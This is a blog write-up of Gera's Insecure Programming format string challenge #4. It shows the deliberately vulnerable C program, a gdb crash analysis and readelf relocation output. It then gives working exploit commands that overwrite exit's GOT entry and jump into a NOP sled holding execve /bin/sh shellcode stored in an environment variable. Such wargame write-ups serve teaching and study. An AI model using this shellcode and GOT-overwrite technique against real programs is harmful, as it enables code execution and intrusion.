Gera's Insecure Programming Format String #4

Vaughn Valle

Vaughn Valle

2 min read

One more completed challenge is needed before we can declare format strings dead. This challenge from the format string section of Gera's Insecure Programming is basically solvable using the same approach as challenge #3.

I am going to keep this post brief. If you want a more detail description of the write-up see challenge #3 write-up.

Gera's challenge is posted below and can be found here.

{% highlight c %}
/* fs4.c *

  • specially crafted to feed your brain by gera */

/* Have you ever heard about code reusability? */

int main(int argv,char **argc) {
char buf[256];

    snprintf(buf,sizeof buf,"%s%6$hn",argc[1]);
    printf(buf);

}
{% endhighlight %}

As you may notice the only different is that direct parameter access ("%6$hn") is used in the format string. As usual, the targeted platform is FreeBSD 8.2-RELEASE.

{% highlight c %}

./fs4 AAAABBBBCCCCDDDD
Segmentation fault (core dumped)
gdb -q fs4 fs4.core
..snip..

0 0x2816f329 in open () from /lib/libc.so.7

(gdb) x/i $eip
0x2816f329 <open+11965>: mov %dx,(%eax)
(gdb) printf "%p %p\n", $eax, $edx
0x44444444 0x10
(gdb) q

{% endhighlight %}

From here, the step are the same as #3. The only difference is that 16 bytes is needed to trigger the vulnerability.

{% highlight c %}

readelf -r fs4

Relocation section '.rel.plt' at offset 0x2b0 contains 5 entries:
Offset Info Type Sym.Value Sym. Name
080496ec 00000107 R_386_JUMP_SLOT 00000000 _init_tls
080496f0 00000407 R_386_JUMP_SLOT 00000000 printf
080496f4 00000507 R_386_JUMP_SLOT 00000000 snprintf
080496f8 00000607 R_386_JUMP_SLOT 00000000 exit
080496fc 00000807 R_386_JUMP_SLOT 00000000 atexit
{% endhighlight %}

Once again, we look for an address in the PLT and use exit's address. The setup of the payload is the same as all previous write-ups: in the environmental variable. The environmental variable was found at 0xbfbd6905. In the payload of the environmental variable, we use the trap instruction ("\xcc") to see if lands in the NOP-sled.

{% highlight c %}

setenv SHELLCODE perl -e 'print "\x90"x65536 ."\xcc"x100000 ."\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80"'
./fs4 AAAABBBBCCCCperl -e 'print "\xfa\x96\x04\x08"."A"x49069'
Trace/BPT trap (core dumped)
{% endhighlight %}

We hit our trap instruction; therefore, simply exchange the "\xcc" with "\x90" and we should get a shell.

{% highlight c %}

setenv SHELLCODE perl -e 'print "\x90"x65536 ."\x90"x100000 ."\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80"'
./fs4 AAAABBBBCCCCperl -e 'print "\xfa\x96\x04\x08"."A"x49069'
$
{% endhighlight %}

lixor_: 4 and format string (FS): 0

Read more